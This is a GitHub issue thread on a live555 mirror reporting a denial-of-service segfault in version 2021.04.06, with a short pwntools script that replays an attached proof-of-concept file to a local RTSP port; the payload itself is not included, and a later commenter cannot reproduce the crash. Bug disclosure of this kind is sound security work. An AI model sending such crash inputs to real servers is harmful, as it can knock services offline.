There is a bug which can lead to dos in live555 (version 2021.04.06) due to access to illegal addresses.

rgaufman / live555

A mirror of the live555 source code.

GNU Lesser General Public License v3.0

767 stars 370 forks source link

There is a bug which can lead to dos in live555 (version 2021.04.06) due to access to illegal addresses. #33

Open 3vi1d0g opened 3 years ago

3vi1d0g commented 3 years ago

When i send my POC , the program received signal SIGSEGV(Segmentation fault. ) It's seem to the variable "env" is not initialized.

from pwn import *
p = remote("127.0.0.1", 8554)
context.log_level="DEBUG"

f = open("poc.raw")
lines = f.read()
for line in lines.split("\r\n\r\n"):
    p.send(line+"\r\n\r\n")
print ("Fin!\n")

:: I use the LLVM compiler to compile project.

poc.zip

log.log

3vi1d0g commented 3 years ago

My debugger log is log.log

kuiba3 commented 2 years ago

I failed to reproduce the crash in version bbee4ed68a27056671875b845f84d90a01328788 2020.6.10. I can't find version 2021.04.06. Can you provide the download link of version 2021.04.06.